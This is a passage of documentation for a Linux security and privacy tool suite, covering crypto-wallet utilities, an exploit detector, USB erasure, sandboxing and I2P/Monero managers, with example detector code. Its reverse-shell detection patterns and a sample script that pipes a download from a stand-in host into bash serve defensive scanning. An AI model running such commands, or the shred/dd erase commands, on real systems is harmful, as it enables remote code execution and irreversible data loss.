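        bits += frombits
        while bits >= tobits:
            bits -= tobits
            out.append((acc >> bits) & maxv)
    if bits >= frombits or ((acc << (tobits - bits)) & maxv):
        return None
    return bytes(out)


def validate_address(addr):
    """Classify an address as (coin, kind, network); None means invalid."""
    if re.fullmatch(r"0x[0-9a-fA-F]{40}", addr):
        # EIP-55 needs keccak-256 (not hashlib's sha3_256), so this is a format check only.
        return ("ethereum", "format-only", None)
    dec = bech32_decode(addr)
    if dec is not None:
        hrp, data, enc = dec
        if hrp not in BECH32_HRPS or not data:
            return None
        version, program = data[0], convertbits(data[1:], 5, 8)
        if program is None or version > 16 or not 2 <= len(program) <= 40:
            return None
        if (enc == "bech32") != (version == 0) or (version == 0 and len(program) not in (20, 32)):
            return None                  # v0 must be bech32 with a 20/32-byte program; v1+ bech32m
        coin, net = BECH32_HRPS[hrp]
        kind = {0: "p2wpkh" if len(program) == 20 else "p2wsh", 1: "p2tr"}.get(version, f"segwit-v{version}")
        return (coin, kind, net)
    b58 = base58check_decode(addr)
    if b58 is None or b58[0] not in B58_VERSIONS:
        return None
    return B58_VERSIONS[b58[0]]
```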

Balance Checker

Checks cryptocurrency address balances.

Supported Coins: Bitcoin (BlockCypher API), Ethereum (Etherscan/Public RPC), Litecoin (BlockCypher API)

balance-checker

Ethereum API Sources: Etherscan (ETHERSCAN_API_KEY required), PublicNode RPC, Ankr RPC, Cloudflare RPC

Coin Watch

Tracks cryptocurrency prices and market data.

Features: Live price tracking, Watchlist management, Portfolio tracking, Price alerts, Tor proxy support, Traffic patterns

coin-watch

Configuration: ~/.config/cyrethium-coinwatch/config.json

Privacy Analyzer

Analyzes privacy features of cryptocurrency addresses.

crypto-privacy-analyzer

Analysis Criteria: Address format, Privacy score (0-100), Recommendations, Risk analysis

Key Backup

Securely backs up private keys.

Features: AES-256 encryption, PBKDF2 (100,000 iterations), Backup and restore

key-backup

Paper Wallet

Creates offline cryptocurrency wallets.

Supported Coins: Bitcoin, Ethereum, Litecoin

Features: QR code generation, WIF format, Multiple wallet creation

paper-wallet

Private Key Converter

Converts private key formats.

Supported Formats: HEX, WIF

Features: HEX ↔ WIF conversion, Address generation, Multi-coin support

private-key-converter

Security Notes

Important Warnings:

  1. Never Share Private Keys
  2. Keep Backups Secure
  3. Test on Test Networks
  4. Start with Small Amounts

Crypted Notes - Encrypted Note Application

Crypted Notes (Securonis Notes) is a modern note-taking application that allows you to store your notes encrypted. Developed with PyQt5, it offers a user-friendly interface and powerful encryption features.

Usage

crypted-notes

Interface Components

Note Editor

Title: Note title input (required)

Content: Rich text editor with formatted text support, color and font selection

Tags: Comma-separated tags (e.g., work, urgent, meeting)

Priority: Low (default), Medium, High

Category: General (default), Work, Personal, Ideas, Tasks, Custom categories can be added

Deadline: Date and time selection with calendar widget (Format: YYYY-MM-DD HH:MM)

Options

  • Encrypt: Encrypt the note
  • Favorite: Mark as favorite
  • Archive: Archive
  • Set Reminder: Set reminder
  • Attachments: File attachments

Buttons

Save: Saves the note (checks: title not empty, password if encryption selected, date format validation)

Clear Form: Clears the form (title, content, tags, all options)

Text Color: Changes text color (color picker opens, selected color applied to text)

Text Font: Changes font (font family, size, style: bold, italic)

File Attachments

Supported Formats: Documents (.txt, .pdf, .doc, .docx), Images (.jpg, .jpeg, .png, .gif)

Limitations: Max file size 10MB, Max 10 attachments per note

Adding Files: Check "Attachments" option → File picker opens → Select file → File encoded with Base64 and saved

Encryption

Algorithm: Fernet (AES-256-CBC)

Process: User enters password → Password hashed with PBKDF2 → Note content encrypted with Fernet → Encrypted data saved

Creating Encrypted Note: Check "Encrypt" option → Save note → Enter password (twice) → Note encrypted and saved

Opening Encrypted Note: Select encrypted note → Enter password → Note decrypted and displayed

WARNING: If you forget the password, the note cannot be recovered!

Reminders

Setting Reminder: Check "Set Reminder" option → Select date and time → Save note

Reminder Notification: Notification shown at specified date/time using system notifications with note title and content preview

Search and Filtering

Search Criteria: Title, Content, Tags, Category

Filter Options: All notes, Favorites, Archived, Encrypted notes, By category, By priority

Export

Formats: JSON, CSV, TXT

Keyboard Shortcuts

General: Ctrl+S (Save), Ctrl+N (New note), Ctrl+F (Search), Ctrl+Q (Exit)

Editing: Ctrl+B (Bold), Ctrl+I (Italic), Ctrl+U (Underline), Ctrl+Z (Undo), Ctrl+Y (Redo)

Troubleshooting

Note Cannot Be Saved: Fill in title field, check disk space, check write permissions

Encrypted Note Cannot Be Opened: Make sure password is correct, Caps Lock should be off, if password forgotten note cannot be recovered

File Cannot Be Attached: File size must be less than 10MB, must be supported format, max 10 attachments limit

FAQ

Q: Where are notes stored? A: In ~/.config/crypted-notes/notes.json file.

Q: How secure is encryption? A: Uses AES-256, industry standard.

Q: What if I forget password? A: Note cannot be recovered, lost if no backup.

Q: Are notes synchronized? A: No, stored locally.

Q: Is there a max note count? A: No, depends on disk space.

Anti-Exploit Suite - Advanced Exploit Detection System

Anti-Exploit Suite is a comprehensive security tool that protects your system against 10 different exploit and attack types. Each module detects and reports specific attack vectors.

Security Modules

1. Cron Hunter

Purpose: Detects malicious commands in scheduled tasks

How it Works:

  • Scans crontab files and systemd timers
  • Analyzes threat indicators like reverse shells, network connections, obfuscation
  • Calculates threat score (0-100)

2. Ghost Service Killer

Purpose: Finds daemon processes not registered with systemd

How it Works:

  • Scans long-running processes (default: 10+ minutes)
  • Compares with systemd services
  • Analyzes network connections and suspicious behavior

3. Hidden Binary Hunter

Purpose: Detects processes running from deleted binary files

How it Works:

  • Searches for "(deleted)" marker in /proc/[pid]/exe
  • Checks RWX (read-write-execute) memory regions
  • Analyzes long runtime and suspicious parent processes
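A Python sketch, added here and not the suite's own module, of what "Hidden Binary Hunter" looks at: the "(deleted)" suffix on /proc/[pid]/exe, RWX regions in /proc/[pid]/maps, and runtime and parent from /proc/[pid]/stat. The scoring weights and the sample maps and stat lines are constructed for the example.

```python
import os
import re

# One line of /proc/[pid]/maps: start-end perms offset dev inode [pathname]
MAPS_LINE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+([rwxps-]{4})\s+\S+\s+\S+\s+\S+\s*(.*)$")


def rwx_regions(maps_text):
    """Return (start, end, pathname) for mappings that are readable, writable and
    executable at once. Normal code pages are not writable, so anonymous RWX
    regions are an indicator of injected code (some JIT runtimes use them
    legitimately, so treat this as a signal, not proof)."""
    regions = []
    for line in maps_text.splitlines():
        m = MAPS_LINE.match(line)
        if m and m.group(3)[:3] == "rwx":
            regions.append((int(m.group(1), 16), int(m.group(2), 16), m.group(4) or "[anon]"))
    return regions


def parse_stat(stat_text):
    """Return (state, ppid, start_ticks) from /proc/[pid]/stat. The comm field is
    in parentheses and may contain spaces, so split after the last ')'."""
    rest = stat_text[stat_text.rindex(")") + 2:].split()
    return rest[0], int(rest[1]), int(rest[19])   # fields 3, 4 and 22 of the stat line


def exe_deleted(pid, proc="/proc"):
    """True if the process image was unlinked after exec (the '(deleted)' suffix)."""
    try:
        return os.readlink(f"{proc}/{pid}/exe").endswith(" (deleted)")
    except OSError:
        return None   # kernel thread, already exited, or not permitted without root


def runtime_seconds(start_ticks, proc="/proc"):
    with open(f"{proc}/uptime") as fh:
        uptime = float(fh.read().split()[0])
    return uptime - start_ticks / os.sysconf("SC_CLK_TCK")


def hunt(proc="/proc", long_runtime=600):
    """Walk /proc and score each process; returns the flagged ones, highest score first."""
    flagged = []
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"{proc}/{pid}/stat") as fh:
                _state, ppid, start = parse_stat(fh.read())
            with open(f"{proc}/{pid}/maps") as fh:
                rwx = rwx_regions(fh.read())
        except OSError:
            continue            # exited meanwhile, or another user's process without root
        deleted = exe_deleted(pid, proc)
        score, reasons = 0, []
        if deleted:
            score += 60; reasons.append("exe deleted")
        if rwx:
            score += 25; reasons.append(f"{len(rwx)} rwx region(s)")
        if score and runtime_seconds(start, proc) > long_runtime:
            score += 10; reasons.append("long runtime")   # only weighs in with another signal
        if score and ppid == 1:
            score += 5; reasons.append("reparented to init")
        if score:
            flagged.append((score, pid, ppid, reasons))
    return sorted(flagged, reverse=True)


# Constructed samples, not captured from a real system.
SAMPLE_MAPS = """\
55d3c0a00000-55d3c0a01000 r-xp 00000000 08:01 1234567 /usr/bin/example
7f1c2d000000-7f1c2d021000 rw-p 00000000 00:00 0
7f1c2e000000-7f1c2e005000 rwxp 00000000 00:00 0
7ffd1a2b3000-7ffd1a2d4000 rw-p 00000000 00:00 0 [stack]
"""
SAMPLE_STAT = "1234 (my prog) S 1 1234 1234 0 -1 4194560 100 0 0 0 5 3 0 0 20 0 1 0 7890 10240000 500\n"

if __name__ == "__main__":
    for score, pid, ppid, reasons in hunt():
        print(f"pid {pid} (ppid {ppid}) score {score}: {', '.join(reasons)}")
```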

4. Reverse Shell Detector

Purpose: Detects reverse shell and C2 (Command & Control) connections

How it Works:

  • Scans network connections (ESTABLISHED state)
  • Searches for reverse shell patterns (bash -i >&, /dev/tcp, nc -e, etc.)
  • Flags connections to suspicious ports (4444, 5555, 1337, etc.)

5. Rootshell Injection Mitigator

Purpose: Detects tampering of system binaries and rootkit injection

How it Works:

  • Calculates SHA256 hashes of critical shell and system binaries
  • Compares with baseline
  • Scans binaries for suspicious strings (socket, exec, setuid, etc.)

6. TTY Hijack Detector

Purpose: Monitors TTY sessions and detects hijacking attempts

How it Works:

  • Scans active TTY sessions
  • Checks for suspicious parent processes
  • Detects LD_PRELOAD injections and environment variable manipulation

7. Zombie Hunter

Purpose: Detects and cleans zombie (defunct) processes

How it Works:

  • Searches for Z (zombie) state in /proc/[pid]/stat
  • Sends SIGCHLD to parent process
  • Terminates parent process if unsuccessful

8. Service Registration Mismatch Finder

Purpose: Finds long-running processes not registered with systemd

How it Works:

  • Scans processes running 10+ minutes
  • Checks systemd cgroups
  • Special check for daemon users (www-data, mysql, etc.)

9. Shebang & Script Obfuscation Scanner

Purpose: Detects obfuscated shell scripts

How it Works:

  • Scans /usr/local/bin, /opt, cron directories
  • Validates shebang
  • Searches for obfuscation patterns:
    • Base64 decode & execute (base64 -d | sh)
    • Remote execution (curl | bash)
    • Eval patterns
    • Hex/octal encoding
  • Analysis: Entropy calculation, character density, long lines
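An added Python example, not the suite's module 9, that scores a shell script with the indicators listed above: shebang validity, the pattern list, Shannon entropy, symbol density and long lines, then walks the named directories. The regexes, weights, thresholds and sample scripts are assumptions made for this example.

```python
import math
import os
import re

# The page's pattern list as regexes (my phrasing of them, an assumption).
OBFUSCATION_PATTERNS = {
    "base64-decode-exec": re.compile(r"base64\s+(?:-d|--decode)\b[^|\n]*\|\s*(?:ba|da)?sh\b"),
    "remote-exec": re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba|da)?sh\b"),
    "eval": re.compile(r"(?<![\w.])eval\b"),
    "hex-escape-run": re.compile(r"(?:\\x[0-9a-fA-F]{2}){4,}"),
    "octal-escape-run": re.compile(r"(?:\\[0-7]{3}){4,}"),
}
WEIGHTS = {"base64-decode-exec": 40, "remote-exec": 40, "eval": 15, "hex-escape-run": 20,
           "octal-escape-run": 20, "no-shebang": 10, "relative-shebang": 20,
           "long-lines": 10, "high-entropy": 15, "symbol-density": 10}
SCAN_DIRS = ["/usr/local/bin", "/opt", "/etc/cron.d", "/etc/cron.daily", "/etc/cron.hourly"]


def shannon_entropy(text):
    """Bits per character; readable shell text sits around 4-4.7, packed blobs higher."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan_script(text, max_line=400, entropy_threshold=5.2, density_threshold=0.35):
    """Score one script 0-100 and list what triggered; (0, []) means nothing found."""
    findings = []
    first = text.split("\n", 1)[0]
    if not first.startswith("#!"):
        findings.append("no-shebang")
    elif not first[2:].strip().startswith("/"):
        findings.append("relative-shebang")   # interpreter is not an absolute path
    for name, pattern in OBFUSCATION_PATTERNS.items():
        if pattern.search(text):
            findings.append(name)
    if any(len(line) > max_line for line in text.splitlines()):
        findings.append("long-lines")         # packed one-liners or embedded blobs
    if shannon_entropy(text) > entropy_threshold:
        findings.append("high-entropy")
    symbols = sum(1 for ch in text if not ch.isalnum() and not ch.isspace())
    if symbols / max(len(text), 1) > density_threshold:
        findings.append("symbol-density")
    return min(100, sum(WEIGHTS[f] for f in findings)), findings


def scan_directories(dirs=SCAN_DIRS, min_score=30):
    """Scan text files under dirs (binaries are skipped) and return (score, path, findings)."""
    hits = []
    for base in dirs:
        for root, _subdirs, files in os.walk(base):
            for name in files:
                path = os.path.join(root, name)
                try:
                    with open(path, "rb") as fh:
                        raw = fh.read(1 << 20)
                except OSError:
                    continue
                if b"\x00" in raw:
                    continue                  # ELF and other binaries are out of scope here
                score, findings = scan_script(raw.decode("utf-8", "replace"))
                if score >= min_score:
                    hits.append((score, path, findings))
    return sorted(hits, reverse=True)


# Constructed samples, not scripts taken from any system.
BENIGN_SCRIPT = "#!/bin/sh\nset -e\necho \"rotating logs\"\nls -l /var/log\n"
SUSPICIOUS_SCRIPT = (
    "#!/bin/bash\n"
    "echo ZWNobyBoZWxsbw== | base64 -d | sh\n"   # the blob decodes to 'echo hello'
    "curl -s http://example.invalid/setup.sh | bash\n"
    "eval \"$cmd\"\n"
)

if __name__ == "__main__":
    for label, text in (("benign", BENIGN_SCRIPT), ("suspicious", SUSPICIOUS_SCRIPT)):
        print(label, scan_script(text))
```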

10. SUID/SGID Anomaly Scanner

Purpose: Detects suspicious SUID/SGID binaries

How it Works:

  • Finds SUID/SGID files system-wide
  • Checks ownership by querying package manager (dpkg/rpm/pacman)
  • Calculates SHA256 hashes
  • Analyzes file permissions and ownership

Usage

sudo anti-exploitsuite

Note: Root privileges recommended for full system scan.

Usage Examples

# Full System Scan
sudo anti-exploitsuite
# Runs each module in sequence

# Specific Module
sudo anti-exploitsuite
> 4  # choose the module number at the menu prompt (4 = Reverse Shell Detector)

Troubleshooting

Module Not Found:

# Check module directories
ls -la /opt/anti-exploit/

# Fix permissions
sudo chmod +x /opt/anti-exploit/*

Root Privileges Required:

sudo anti-exploitsuite

Security Notes

Important: False positives may occur - some legitimate applications may be detected. Always verify findings before taking action.

USB Toolkit - USB Drive Operations

USB Toolkit is a secure erase, format and management tool for USB drives.

Features

  • USB device listing
  • Secure erase (shred)
  • Random data fill
  • Format (FAT32, NTFS, EXT4)
  • System disk protection

Usage

sudo usbtoolkit

Note: Requires root privileges.

Main Menu (Interactive Mode)

1. List USB devices: Lists USB devices

2. Show device information: Shows device details (size, model, vendor, partitions, filesystem)

3. Secure erase (shred): Secure erase (3 passes) - shred -v -n 3 -z /dev/sdb - WARNING: All data will be deleted!

4. Fill with random data: Random data fill - dd if=/dev/urandom of=/dev/sdb bs=4M

5. Format: Format options - FAT32 (vfat): Windows/Linux compatible, NTFS: Windows, EXT4: Linux

Command Line Usage

# List
sudo usbtoolkit --list

# Info
sudo usbtoolkit --info /dev/sdb

# Secure Erase
sudo usbtoolkit --erase /dev/sdb

# Random Fill
sudo usbtoolkit --random /dev/sdb

# Format
sudo usbtoolkit --format /dev/sdb vfat
sudo usbtoolkit --format /dev/sdb ntfs
sudo usbtoolkit --format /dev/sdb ext4

Security Measures

System Disk Protection: Before any destructive operation, checks whether the target is the device holding the root partition (/), is /dev/sda, or is currently mounted

Unmount: All partitions unmounted before operation (umount /dev/sdb1, umount /dev/sdb2)
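
The two safety measures above, as an added example written for this page rather than the usbtoolkit source. It parses /proc/mounts (the sample content is constructed), works out which whole disk holds the root filesystem, refuses /dev/sda and the root disk, and lists the partitions of the chosen device that would have to be unmounted before shred, dd or mkfs touch it. The nvme/mmcblk partition naming is handled because a plain "strip trailing digits" rule gets those wrong.

```python
"""Added example of the safety check behind USB Toolkit's "System Disk
Protection" and "Unmount" steps. Illustrative code for this page, not the
usbtoolkit source; the /proc/mounts sample below is constructed."""
import re

# Constructed /proc/mounts content (fields: device, mountpoint, fstype, options, dump, pass)
SAMPLE_MOUNTS = """\
/dev/sda2 / ext4 rw,relatime 0 0
/dev/sda1 /boot/efi vfat rw,relatime 0 0
/dev/sdb1 /media/user/MY\\040STICK vfat rw,nosuid,nodev 0 0
/dev/nvme0n1p2 /home ext4 rw,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev 0 0
"""


def parent_disk(node: str) -> str:
    """Partition node -> whole-disk node: sdb1 -> sdb, nvme0n1p2 -> nvme0n1, sdb -> sdb."""
    m = re.fullmatch(r"(/dev/(?:nvme\d+n\d+|mmcblk\d+))p\d+", node)
    if m:
        return m.group(1)
    m = re.fullmatch(r"(/dev/[a-z]+)\d+", node)
    return m.group(1) if m else node


def parse_mounts(text: str) -> dict[str, str]:
    """Map each mounted /dev node to its mount point (decoding \\ooo escapes)."""
    mounts = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2 or not parts[0].startswith("/dev/"):
            continue
        mountpoint = re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), parts[1])
        mounts[parts[0]] = mountpoint
    return mounts


def check_target(device: str, mounts_text: str = SAMPLE_MOUNTS) -> dict:
    """Decide whether a destructive operation on `device` must be refused,
    and which of its partitions would have to be unmounted first."""
    mounts = parse_mounts(mounts_text)
    root_disk = next((parent_disk(dev) for dev, mp in mounts.items() if mp == "/"), None)
    reasons = []
    if device == "/dev/sda":
        reasons.append("/dev/sda is usually the system disk")
    if device == root_disk:
        reasons.append("device holds the root partition (/)")
    mounted = sorted(dev for dev in mounts if dev == device or parent_disk(dev) == device)
    return {
        "device": device,
        "protected": bool(reasons),
        "reasons": reasons,
        "mounted_partitions": mounted,          # umount these before shred/dd/mkfs
        "mount_points": [mounts[d] for d in mounted],
    }


if __name__ == "__main__":
    for dev in ("/dev/sda", "/dev/sdb", "/dev/nvme0n1"):
        print(check_target(dev))
    # Live use: check_target(dev, open("/proc/mounts").read())
```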

Warnings

Select correct device! Wrong device selection causes data loss.

Don't erase system disk! /dev/sda is usually the system disk.

Backup! Operation is irreversible.

SystemKnight - Malware and Rootkit Scanner

SystemKnight is a malware and rootkit scanning tool that manages ClamAV and rkhunter tools.

Usage

sudo systemknight

Note: Requires root privileges.

Main Menu

1. ClamAV Scan (Malware Detection)

Quick scan (home directory): Scans user directory, fast scan

Full system scan: Scans entire system, excludes /proc, /sys, /dev

Custom directory scan: Scans specified directory

Scan and remove infected files: Scans and removes infected files - WARNING: Irreversible!

2. rkhunter Scan (Rootkit Detection)

Standard system check: Normal rootkit scan

Check with only warnings displayed: Show only warnings

Thorough system check: Detailed scan

3. Update All Definitions

Updates virus and rootkit definitions.

4. System Information

Shows system information: Hostname, Kernel version, Operating system, ClamAV version, rkhunter version

5. Install Dependencies

Installs ClamAV and rkhunter.

SHA256 Checksum - File Integrity Verification

SHA256 Checksum is a SHA256 hash calculation and verification tool for verifying file integrity.

Features

  • SHA256 checksum calculation
  • Checksum verification
  • Batch processing
  • Verification from checksum file

Usage

sha256checksum

Main Menu

1. Calculate SHA256 checksum

Calculates the checksum for a single file.

File path: /home/user/file.iso

Output:
File: /home/user/file.iso
SHA256: a1b2c3d4e5f6...

Save checksum to file? [y/N]: y
Checksum saved to: /home/user/file.iso.sha256

2. Verify SHA256 checksum

Verifies file checksum.

File path: /home/user/file.iso
Enter expected SHA256 checksum: a1b2c3d4e5f6...

Output:
File: /home/user/file.iso
Expected: a1b2c3d4e5f6...
Actual:   a1b2c3d4e5f6...

✓ Checksum verified! File integrity confirmed.

3. Batch calculate checksums

Calculates checksums for all files in a folder.

Enter directory path: /home/user/downloads
File extension filter: *.iso

Output:
✓ Checksums calculated for 5 files
Results saved to: checksums_20250126_171200.sha256

4. Verify from checksum file

Verifies all checksums listed in a .sha256 file.

Enter checksum file path: checksums.sha256

Output:
file1.iso: OK
file2.iso: OK
file3.iso: FAILED

✗ Issues detected with some files
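
Menu items 3 and 4 read and write the same list format as sha256sum (`<hex digest>  <file name>`, with `*name` marking binary mode). The block below is an added example written for this page, not the sha256checksum source: it hashes files in chunks so a multi-gigabyte ISO never has to fit in memory, parses that format strictly, and reports OK, FAILED or MISSING per entry. The files it checks are constructed in a temporary directory, with one file modified after the list was written and one entry for a file that does not exist.

```python
"""Added example of verification in the sha256sum file format used by the
"Verify from checksum file" menu item. Illustrative code written for this
page, not the sha256checksum source; the sample files are constructed."""
import hashlib
import os
import tempfile


def sha256_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Hash a file in 1 MiB chunks so large ISOs do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()


def parse_checksum_file(path: str) -> list[tuple[str, str]]:
    """Parse '<hex>  <name>' lines; '*name' is sha256sum's binary-mode marker."""
    entries = []
    with open(path, "r", encoding="utf-8") as fh:
        for line in fh:
            line = line.rstrip("\n")
            if not line.strip() or line.startswith("#"):
                continue
            digest, _, rest = line.partition(" ")
            name = rest.lstrip(" ")
            if name.startswith("*"):
                name = name[1:]
            digest = digest.lower()
            if len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest) or not name:
                raise ValueError(f"malformed checksum line: {line!r}")
            entries.append((name, digest))
    return entries


def verify_checksum_file(path: str) -> dict[str, str]:
    """Return {name: 'OK' | 'FAILED' | 'MISSING'}, resolving names relative to the list."""
    base = os.path.dirname(os.path.abspath(path))
    results = {}
    for name, expected in parse_checksum_file(path):
        target = os.path.join(base, name)
        if not os.path.isfile(target):
            results[name] = "MISSING"
        elif sha256_file(target) == expected:
            results[name] = "OK"
        else:
            results[name] = "FAILED"
    return results


def write_checksum_file(path: str, names: list[str]) -> None:
    """Write a sha256sum-compatible list for files next to `path` (menu item 3)."""
    base = os.path.dirname(os.path.abspath(path))
    with open(path, "w", encoding="utf-8") as fh:
        for name in names:
            fh.write(f"{sha256_file(os.path.join(base, name))}  {name}\n")


def demo() -> dict[str, str]:
    """Constructed scenario: two intact files, one tampered after hashing, one missing."""
    d = tempfile.mkdtemp()
    for name, data in (("file1.iso", b"alpha"), ("file2.iso", b"beta"), ("file3.iso", b"gamma")):
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(data)
    listing = os.path.join(d, "checksums.sha256")
    write_checksum_file(listing, ["file1.iso", "file2.iso", "file3.iso"])
    with open(listing, "a", encoding="utf-8") as fh:
        fh.write(f"{'0' * 64} *file4.iso\n")   # entry for a file that was never downloaded
    with open(os.path.join(d, "file3.iso"), "ab") as fh:
        fh.write(b"-tampered")                 # simulate modification after the list was made
    return verify_checksum_file(listing)


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{name}: {status}")
```

A checksum only proves the file matches the list; if the list was fetched over the same channel as the file, both can be swapped together, which is why release checksums are normally published with a signature as well.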

Cyrethium Jails Manager - Interactive Firejail Sandbox Tool

Cyrethium Jails Manager is an interactive tool designed to run applications in secure sandbox environments using Firejail. You can easily configure security settings with a user-friendly menu system.

Usage

cyrethium-jails

Note: Do not run as root! Run it as a normal user.

Main Menu

1. Launch Application in Sandbox

Runs an application in sandbox with custom security settings.

Configuration Options: Network access, Home directory isolation, Temporary filesystem, Sound access, 3D acceleration, Webcam access, Read-only filesystem, Seccomp filtering, AppArmor, Custom profile

2. Quick Launch with Presets

Preset 1 - Maximum Security: Strictest security settings for untrusted applications

Preset 2 - Internet Browser: For web browsers (Firefox, Chrome, Brave)

Preset 3 - Office Application: For office apps (LibreOffice, PDF readers)

Preset 4 - Media Player: For media players (VLC, MPV)

Preset 5 - Development Tool: For IDEs and code editors

3. List Active Sandboxes

Lists all running Firejail sandboxes.

4. Kill Sandbox Process

Terminates a specific sandbox process.

5. Show Firejail Profiles

Lists available Firejail profiles. Profile location: /etc/firejail/

6. System Information

Shows system and security features.

Firejail Options Details

--net=none: Blocks all network access

--private: Creates empty temporary home directory

--private-tmp: Creates private /tmp directory

--nosound: Blocks access to sound devices

--no3d: Disables 3D acceleration

--novideo: Blocks webcam access

--seccomp: Filters dangerous system calls

--apparmor: Applies AppArmor confinement

Limitations

1. Root-requiring apps: Firejail cannot run apps requiring root

2. Kernel modules: Access to kernel modules blocked (affects VirtualBox, VMware)

3. Hardware access: Direct hardware access limited (USB devices, special hardware)

4. X11 apps: Some GUI apps may need extra configuration (use --x11 option)

FAQ

Q: Does Cyrethium Jails require root? A: No, it works as a normal user. Don't run as root!

Q: Difference between Firejail and Plaztek? A: Firejail is more user-friendly and optimized for GUI apps. Plaztek is lighter for scripts.

Q: Do all apps work with Firejail? A: Most work, but some special apps may need extra configuration.

Q: Performance impact? A: Minimal, most users won't notice.

Q: Can an application escape from the sandbox? A: Theoretically not possible, but kernel bugs may pose a risk.

Q: Multiple sandboxes simultaneously? A: Yes, run as many as you want.

FastCrypt - Fast File Encryption

FastCrypt is a simple and fast file encryption tool based on PyQt5. Securely encrypts your files using Fernet (AES-256) encryption.

Usage

fastcrypt

Main Functions

1. Select File: Select file to encrypt or decrypt

2. Enter Password: Enter password (same password for encryption and decryption)

3. Encrypt: Encrypts file and adds .fcrypt extension (e.g., document.pdf → document.pdf.fcrypt)

4. Decrypt: Decrypts .fcrypt file to original (e.g., document.pdf.fcrypt → document.pdf)

Security Notes

Important: Don't forget password (no recovery), use strong password, securely delete original file

MetadataCleaner - Image Metadata Cleaner

MetadataCleaner is a PyQt5-based tool that removes EXIF and metadata information from image files. Removes metadata for privacy.

Usage

metadatacleaner

Main Functions

1. Select Path: Select file or folder (File: single file, Folder: folder scan)

2. Scan Subfolders: Scan subfolders too

3. Clean Metadata: Clean metadata (Process: File backed up → Metadata removed → File verified → Restore from backup if failed)

Supported Formats

.png, .jpg, .jpeg, .tiff, .bmp, .gif, .webp, .tif, .ico, .svg, .heic, .heif, .raw, .cr2, .nef, .arw, .dng, .psd, .ai, .eps

Important

Original files backed up, restore on failed operation, max file size: 100MB

Network Stats - Network Statistics and Fix

Network Stats is a simple bash tool that displays network configuration and fixes issues.

Usage

sudo network-stats

Main Menu

1. Show Network Interfaces: Shows active network interfaces

2. Show Routing Information: Shows routing table

3. Show DNS Configuration: Shows DNS servers

4. Show Active Connections: Shows listening services

5. Run Connectivity Test: Tests internet connection

6. Show All Network Info: Shows all information

7. Fix Network & Reset IPTables: Resets network and firewall - WARNING: All iptables rules will be deleted!

Important

The network fixer requires root. Do not use it while Tor is active: all firewall rules will be deleted.

NodeChecker - Tor Circuit Viewer

NodeChecker is a PyQt5-based tool that visually monitors circuits and streams in the Tor network. Forked from Tails' "Onion Circuits" tool.

Usage

sudo nodechecker

Note: Tor must be running.

Interface

Left Panel: Shows Circuit/Stream list

Right Panel: Shows Node details

I2P Router Menu - Anonymous Internet Network

I2P Router Menu is a PyQt5-based interface for managing the I2P (Invisible Internet Project) network. I2P is an anonymous communication network alternative to Tor.

What is I2P?

Basic Concept: I2P is a peer-to-peer anonymous network. Unlike Tor, which is built to exit to the clearnet, all communication stays within the I2P network.

Tor vs I2P

Aspect    | Tor                          | I2P
Purpose   | Anonymous access to clearnet | P2P anonymous network
Structure | Circuit-based                | Packet-switched
Speed     | Medium                       | Faster (for P2P)
Usage     | Web browsing                 | File sharing, messaging

How I2P Works

1. Garlic Routing: Uses "garlic routing" instead of Tor's "onion routing" - Multiple messages in one packet, more efficient, traffic analysis harder

2. Tunnels: Each user creates 2 types of tunnels - Inbound (Internet → Peer 1 → Peer 2 → Peer 3 → YOU) and Outbound (YOU → Peer A → Peer B → Peer C → Target). Each tunnel changes every 10 minutes, minimum 3 hops, 2 separate tunnels for bidirectional communication

3. NetDB (Network Database): No central server in I2P. Uses Distributed Hash Table (DHT) - Peer addresses, tunnel info, encryption keys

4. Eepsite (.i2p): I2P's own websites - example.i2p accessible within I2P, not accessible from clearnet

Usage

i2p-routermenu

Main Menu

1. Start I2P Router: Starts I2P router and opens console in browser (http://127.0.0.1:7657/)

2. Stop I2P Router: Stops I2P

3. Graceful Stop: Gracefully stops I2P (may take up to 11 minutes) - Active tunnels closed, connections cleanly terminated, data loss prevented

4. Restart I2P Router: Restarts I2P

5. Check I2P Status: Checks if I2P is running

6. Install I2P (Auto-Start): Auto-starts I2P at system boot

7. Remove I2P (Disable Auto-Start): Disables auto-start

8. View Thread Dump: Shows Java thread dump (for debugging)

Important

1. First Start: Wait 10-15 minutes (network integration)

2. Clearnet: I2P not optimized for clearnet exit like Tor

Tips

1. Bandwidth: More bandwidth = Better performance

2. Uptime: Keep open longer (contributes to network)

Monerothium - Monero Wallet Manager

Monerothium is an interactive tool designed to manage Monero (XMR) wallet operations. Enables secure Monero transactions over Tor network.

Usage

monerothium

First Run: Tor connection checked when program starts - WARNING: Risky to continue without Tor connection!

Wallet Management

1. Create New Wallet: Creates new Monero wallet (Enter wallet name → Select network → Set strong password → Save seed phrase 25 words) - IMPORTANT: Keep seed phrase safe!

2. Open Existing Wallet: Opens previously created wallet

3. Restore Wallet from Seed: Restores wallet with 25-word seed phrase

Wallet Operations

4. Show Wallet Info: Shows detailed wallet info (Primary address, Seed phrase, View key, Spend key)

5. Show Balance: Shows wallet balance

6. Show All Addresses: Lists primary address and all subaddresses

7. Create New Subaddress: Creates new subaddress

8. Send XMR: Sends Monero - CAUTION: Double-check address!

9. Show Transactions: Shows transaction history (All, Incoming, Outgoing, Pending, Failed, Pool)

10. Sweep All Funds: Sends entire balance to address - CAUTION: All balance sent!

11. Show Seed Words: Shows 25-word seed phrase - SECURITY: No one should see screen!

12. Refresh Wallet: Scans blockchain and updates balance

13. Check Wallet Status: Shows wallet and daemon status

Advanced Features

14. Integrated Address Operations: Generate random or specific payment ID integrated addresses

15. Payment Verification: Check payment by payment ID, verify transaction proof

16. Transaction Key Management: Store and retrieve transaction keys

17. Address Book: Show all entries, add new, delete

